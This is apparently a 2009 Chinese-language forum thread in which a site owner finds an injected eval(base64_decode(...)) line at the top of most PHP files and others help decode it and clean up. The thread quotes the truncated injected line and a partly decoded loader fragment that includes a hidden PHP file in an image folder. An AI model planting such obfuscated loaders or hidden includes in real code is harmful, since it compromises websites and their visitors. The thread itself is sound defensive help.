網站裡的php上頭出現陌生的亂碼

hgl · #1 2009-02-09, 11:57 PM

由於最近網站異常,當要查看時,發現網站裡大部份的php檔開頭最上方皆出現如下程式碼..

引用:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZX...')); ?>

小弟擔心是否被植入木馬,不知這是什麼情況?該如何解決?
謝謝!

lukawa · #2 2009-02-10, 12:08 AM

應該是被植入一些後門程式的連結，連到你網站的人就會中獎
應該可以把那段CODE，用base64_decode顯示出來讀取看看內容
看他到底連到哪裡去，常常會連來連去的

hgl · #3 2009-02-10, 12:16 AM

引用:

作者: lukawa

應該是被植入一些後門程式的連結，連到你網站的人就會中獎
應該可以把那段CODE，用base64_decode顯示出來讀取看看內容
看他到底連到哪裡去，常常會連來連去的

請問如何讀取呢?謝謝!

jack111 · #4 2009-02-10, 06:40 AM

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/aipubcom/public_html/cgi/photo/theme/jasmin/image/copper.php')){include_once('/home/aipubcom/public_html/cgi/photo/theme/jasmin/image/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode'))

选decode the data from a Base64 string

http://www.motobit.com/util/base64-decoder-encoder.asp

lukawa · #5 2009-02-10, 06:55 AM

如上述jack111兄所言，找個online decoder，或是把eval改成echo應該也可以
不過很多編碼，它會好幾層，所以需要有點耐心跟技巧

hgl · #6 2009-02-10, 08:42 PM

謝謝兩位大大協助幫忙,今天似乎有擴散的情況,解出來的部份有我站內的程式路徑,不知是否為發作源頭所在...?

lukawa · #7 2009-02-10, 08:48 PM

我覺得你最好把全部的程式都刪掉，然後重新上傳乾淨沒問題的程式
這樣會最安全